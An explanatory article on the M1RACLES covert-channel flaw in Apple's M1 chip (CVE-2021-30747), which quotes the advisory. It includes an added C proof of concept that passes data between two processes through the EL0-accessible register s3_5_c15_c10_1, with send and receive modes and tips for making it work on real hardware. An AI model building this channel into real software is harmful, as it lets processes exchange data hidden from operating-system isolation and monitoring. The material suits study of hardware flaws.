M1RACLES (CVE-2021-30747): covert channel vulnerability in the Apple Silicon chip

Developers have found a design flaw in Apple's in-house M1 processor that cannot be patched in software: removing it would require Apple to change the chip's design.

The Asahi Linux crew discovered that Apple's M1 chip has a flaw that allows any two cooperating applications running under the same operating system to exchange data covertly, without using shared memory, sockets, files, or any other normal operating system facility. That sidesteps the process isolation the operating system is supposed to enforce.

The Asahi Linux crew refers to this vulnerability as M1RACLES (CVE-2021-30747). They described it as mostly harmless: it cannot be used to compromise a Mac, and exploits or malware cannot use it to steal or tamper with data stored on the computer. It only lets two processes that are already running, and already cooperating, pass bits to each other.

This vulnerability is summed up as, “A flaw in the design of the Apple Silicon ‘M1’ chip allows any two applications running under an OS to covertly exchange data between them, without using memory, sockets, files, or any other normal operating system features. This works between processes running as different users and under different privilege levels, creating a covert channel for surreptitious data exchange…The ARM system register encoded as s3_5_c15_c10_1 is accessible from EL0, and contains two implemented bits that can be read or written (bits 0 and 1). This is a per-cluster register that can be simultaneously accessed by all cores in a cluster. This makes it a two-bit covert channel that any arbitrary process can use to exchange data with another cooperating process.”
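To make the two-bit channel concrete, the following is an added example written for this page; it is not the Asahi Linux proof of concept and not code from the article. It reads and writes s3_5_c15_c10_1 with mrs/msr only when compiled on Apple Silicon; everywhere else a process-local 2-bit variable stands in for the shared register so the framing can be exercised. The choice of bit 0 as data and bit 1 as clock, the MSB-first byte framing, the busy-poll receiver and the send/recv command-line convention are all assumptions made here, not details taken from the advisory.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* The register exposes two implemented bits (bits 0 and 1). Treating bit 0 as
 * data and bit 1 as a clock is an assumption made for this example; it is one
 * workable framing, not necessarily the one the public PoC uses. */
#define DATA_BIT  0x1u
#define CLOCK_BIT 0x2u

typedef uint32_t (*reg_read_fn)(void);
typedef void     (*reg_write_fn)(uint32_t v);

#if defined(__aarch64__) && defined(__APPLE__)
/* Real channel: the per-cluster system register, accessible from EL0. Compiled
 * only on Apple Silicon (assumption: macOS leaves the encoding untrapped). If
 * the kernel or a hypervisor does trap it, the instruction raises an exception
 * and the process dies with SIGILL. */
static uint32_t hw_read(void) {
    uint64_t v;
    __asm__ volatile("mrs %0, s3_5_c15_c10_1" : "=r"(v));
    return (uint32_t)(v & 3u);
}
static void hw_write(uint32_t v) {
    uint64_t w = v & 3u;
    __asm__ volatile("msr s3_5_c15_c10_1, %0" : : "r"(w) : "memory");
}
#endif

/* Receiver: a state machine fed each observed register value. A bit is
 * accepted whenever the clock bit changes; bytes are assembled MSB first. */
struct receiver {
    uint32_t last_clock;
    unsigned nbits;
    uint8_t  cur;
    uint8_t  out[64];
    size_t   out_len;
};

static void receiver_observe(struct receiver *r, uint32_t reg) {
    uint32_t clk = reg & CLOCK_BIT;
    if (clk == r->last_clock) return;          /* sender has not clocked a new bit */
    r->last_clock = clk;
    r->cur = (uint8_t)((r->cur << 1) | (reg & DATA_BIT));
    if (++r->nbits == 8) {
        if (r->out_len < sizeof r->out) r->out[r->out_len++] = r->cur;
        r->nbits = 0;
        r->cur = 0;
    }
}

/* Sender: place the data bit and flip the clock in one write so the receiver
 * samples it. The clock's starting phase is whatever the register holds now. */
static void send_byte(reg_read_fn rd, reg_write_fn wr, uint8_t b) {
    uint32_t clk = rd() & CLOCK_BIT;
    for (int i = 7; i >= 0; i--) {
        clk ^= CLOCK_BIT;
        wr(clk | ((uint32_t)(b >> i) & 1u));
    }
}

/* Simulated channel (constructed stand-in for the register): every write is
 * immediately "polled" by the receiver, as the second process would do on
 * real hardware. */
static uint32_t        sim_reg;
static struct receiver sim_rx;
static uint32_t sim_read(void) { return sim_reg & 3u; }
static void sim_write(uint32_t v) {
    sim_reg = v & 3u;
    receiver_observe(&sim_rx, sim_read());
}

/* Push a whole string through the simulated channel; returns 1 if the
 * receiver reconstructed it exactly, 0 otherwise. */
int covert_selftest(const char *msg) {
    memset(&sim_rx, 0, sizeof sim_rx);
    sim_reg = 0;
    for (const char *p = msg; *p; p++)
        send_byte(sim_read, sim_write, (uint8_t)*p);
    return sim_rx.out_len == strlen(msg) &&
           memcmp(sim_rx.out, msg, sim_rx.out_len) == 0;
}

int main(int argc, char **argv) {
#if defined(__aarch64__) && defined(__APPLE__)
    /* Two-process use on real hardware: "./m1 send TEXT" in one shell and
     * "./m1 recv" in another; neither touches memory, sockets or files. */
    if (argc == 3 && strcmp(argv[1], "send") == 0) {
        for (const char *p = argv[2]; *p; p++) send_byte(hw_read, hw_write, (uint8_t)*p);
        return 0;
    }
    if (argc == 2 && strcmp(argv[1], "recv") == 0) {
        struct receiver rx = { .last_clock = hw_read() & CLOCK_BIT };
        while (rx.out_len < 8) receiver_observe(&rx, hw_read());  /* busy-poll */
        fwrite(rx.out, 1, rx.out_len, stdout);
        putchar('\n');
        return 0;
    }
#endif
    (void)argc; (void)argv;
    printf("simulated round trip: %s\n", covert_selftest("M1RACLES") ? "ok" : "FAIL");
    return 0;
}
```

Two practical points the simulation hides. On real hardware the sender can flip the clock several times between two receiver polls, so a usable channel has to pace its writes or add a handshake; with only two bits there is no spare ack bit, which is why a real implementation ends up timing-based. And the register is per cluster: a sender and receiver scheduled on different clusters see different registers, so a hardware run needs both processes pinned to the same cluster (or retried until they land on one).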

The Asahi Linux crew also said that the flaw is baked into the M1 silicon itself. Because it is the hardware that exposes the register, no software update can remove it; only a redesigned chip could.